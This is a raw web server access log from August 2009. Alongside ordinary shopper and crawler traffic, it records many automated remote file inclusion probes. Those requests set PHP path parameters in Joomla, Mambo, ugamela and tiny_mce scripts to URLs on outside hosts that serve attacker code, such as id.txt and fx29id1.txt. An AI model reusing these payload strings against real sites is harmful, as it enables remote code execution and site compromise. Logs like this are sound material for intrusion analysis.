67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/items/2001108_THUMB.JPG HTTP/1.1" 200 2510 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:02:55 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:03:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1171C24D22A5A50041F304X+M37+ENG HTTP/1.1" 200 50836 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24821B5A5003DB304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:03:04 -0400] "GET /images/items/0602046_THUMB.JPG HTTP/1.1" 200 2626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24D22A5A50041F304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:03:04 -0400] "GET /images/items/0100151_THUMB.JPG HTTP/1.1" 200 1926 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24D22A5A50041F304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.83.150.173 - - [02/Aug/2009:00:03:04 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1171C24D22A5A50041F304X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
209.59.12.99 - - [02/Aug/2009:00:03:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.117.207.76 - - [02/Aug/2009:00:04:55 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_simpleboard/image_upload.php?sbp=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:00:05:05 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.60.46 - - [02/Aug/2009:00:06:41 -0400] "GET /errors.php?error=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.60.46 - - [02/Aug/2009:00:06:41 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.60.46 - - [02/Aug/2009:00:06:41 -0400] "GET /logs/errors.php?error=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.60.46 - - [02/Aug/2009:00:06:56 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:08:16 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:08:17 -0400] "GET /show.php?path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:08:18 -0400] "GET /logs/show.php?path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Aug/2009:00:08:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
141.223.5.11 - - [02/Aug/2009:00:08:31 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:08:32 -0400] "GET /show.php?path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:08:32 -0400] "GET /logs/show.php?path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
209.172.33.230 - - [02/Aug/2009:00:10:57 -0400] "GET /logs/access_log.Q109070600//includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
209.172.33.230 - - [02/Aug/2009:00:10:57 -0400] "GET /logs//includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.812"
209.172.33.230 - - [02/Aug/2009:00:10:57 -0400] "GET //includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
86.58.155.104 - - [02/Aug/2009:00:11:01 -0400] "GET //includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
86.58.155.104 - - [02/Aug/2009:00:11:01 -0400] "GET /logs//includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
86.58.155.104 - - [02/Aug/2009:00:11:01 -0400] "GET /logs/access_log.Q109070600//includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
209.172.33.230 - - [02/Aug/2009:00:11:04 -0400] "GET //includes/todofleetcontrol.php?ugamela_root_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
209.172.33.230 - - [02/Aug/2009:00:11:04 -0400] "GET /logs//includes/todofleetcontrol.php?ugamela_root_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.812"
209.172.33.230 - - [02/Aug/2009:00:11:04 -0400] "GET /logs/access_log.Q109070600//includes/todofleetcontrol.php?ugamela_root_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
72.30.81.182 - - [02/Aug/2009:00:11:16 -0400] "GET /logs/access_log.Q109072100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.172.33.230 - - [02/Aug/2009:00:11:57 -0400] "GET /logs/error_log.Q109070600//includes/todofleetcontrol.php?ugamela_root_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.812"
209.172.33.230 - - [02/Aug/2009:00:11:58 -0400] "GET /logs/error_log.Q109070600//includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.812"
86.58.155.104 - - [02/Aug/2009:00:12:23 -0400] "GET /logs/error_log.Q109070600//includes/todofleetcontrol.php?ugamela_root_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Aug/2009:00:13:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.3 - - [02/Aug/2009:00:13:32 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:00:13:32 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:15:09 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:15:09 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:15:09 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:15:10 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:16:08 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:16:08 -0400] "GET /show.php?path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:16:09 -0400] "GET /logs/show.php?path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
123.125.66.119 - - [02/Aug/2009:00:16:39 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
201.217.51.191 - - [02/Aug/2009:00:16:51 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:16:51 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.169.138.128 - - [02/Aug/2009:00:17:15 -0400] "GET /logs/access_log.Q109071000//includes/todofleetcontrol.php?ugamela_root_path=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
81.169.138.128 - - [02/Aug/2009:00:17:15 -0400] "GET //includes/todofleetcontrol.php?ugamela_root_path=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
81.169.138.128 - - [02/Aug/2009:00:17:15 -0400] "GET /logs//includes/todofleetcontrol.php?ugamela_root_path=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
116.122.158.207 - - [02/Aug/2009:00:17:18 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:00:17:18 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 12010 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:00:17:23 -0400] "GET /logs/access_log.Q109071000//includes/todofleetcontrol.php?ugamela_root_path=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:00:17:23 -0400] "GET //includes/todofleetcontrol.php?ugamela_root_path=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:00:17:23 -0400] "GET /logs//includes/todofleetcontrol.php?ugamela_root_path=http://www.sailingshop.gr/components/com_rsgallery2/images/yes.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
116.122.158.207 - - [02/Aug/2009:00:17:25 -0400] "GET /logs/access_log.Q109052300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:00:17:59 -0400] "GET /logs/error_log.Q109052300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:00:18:00 -0400] "GET /logs/error_log.Q109052400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:00:18:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.46.175.14 - - [02/Aug/2009:00:18:55 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:00:19:14 -0400] "GET /logs/error_log.Q109070800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:19:43 -0400] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:19:43 -0400] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:19:43 -0400] "GET /logs/access_log.Q109052100/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:20:04 -0400] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:20:04 -0400] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:20:04 -0400] "GET /logs/access_log.Q109052100%20%20/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:00:20:17 -0400] "GET /logs/access_log.Q109052300///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:20:26 -0400] "GET /logs/access_log.Q109062300/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:00:20:29 -0400] "GET /logs/error_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.50 - - [02/Aug/2009:00:20:35 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.121.191.69 - - [02/Aug/2009:00:21:26 -0400] "GET //include/lib.inc.php?site_path=http://www.milanoinc.com//math-tools/id1.txt? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
128.121.191.69 - - [02/Aug/2009:00:21:26 -0400] "GET /logs/access_log.Q109061700%20%20//include/lib.inc.php?site_path=http://www.milanoinc.com//math-tools/id1.txt? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
128.121.191.69 - - [02/Aug/2009:00:21:26 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.milanoinc.com//math-tools/id1.txt? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
128.121.191.69 - - [02/Aug/2009:00:21:27 -0400] "GET /logs/access_log.Q109071900%20%20//include/lib.inc.php?site_path=http://www.milanoinc.com//math-tools/id1.txt? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
220.181.7.126 - - [02/Aug/2009:00:21:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
201.217.51.191 - - [02/Aug/2009:00:22:05 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:00:22:07 -0400] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:00:22:07 -0400] "GET /logs/access_log.Q109052100/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:00:22:08 -0400] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:00:22:15 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:22:20 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.217.51.191 - - [02/Aug/2009:00:22:20 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:00:22:31 -0400] "GET /logs/access_log.Q109052100/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:00:22:31 -0400] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:00:22:33 -0400] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
201.217.51.191 - - [02/Aug/2009:00:22:48 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.fernandofu.com/.../fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:00:23:02 -0400] "GET /logs/access_log.Q109062300/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
72.44.187.42 - - [02/Aug/2009:00:23:23 -0400] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:00:23:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.44.187.42 - - [02/Aug/2009:00:23:27 -0400] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:00:23:32 -0400] "GET /logs/access_log.Q109052100%20%20/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.44.187.42 - - [02/Aug/2009:00:25:16 -0400] "GET /logs/access_log.Q109062300/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
76.89.226.19 - - [02/Aug/2009:00:26:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
76.89.226.19 - - [02/Aug/2009:00:26:14 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
76.89.226.19 - - [02/Aug/2009:00:26:15 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
76.89.226.19 - - [02/Aug/2009:00:26:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
72.44.187.42 - - [02/Aug/2009:00:26:28 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.gembrookfruits.com/lib/classes/module_support/fx29id.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.52.136.211 - - [02/Aug/2009:00:28:06 -0400] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:06 -0400] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:09 -0400] "GET /logs/access_log.Q109062800//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:12 -0400] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:13 -0400] "GET /logs/access_log.Q109062800//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:13 -0400] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
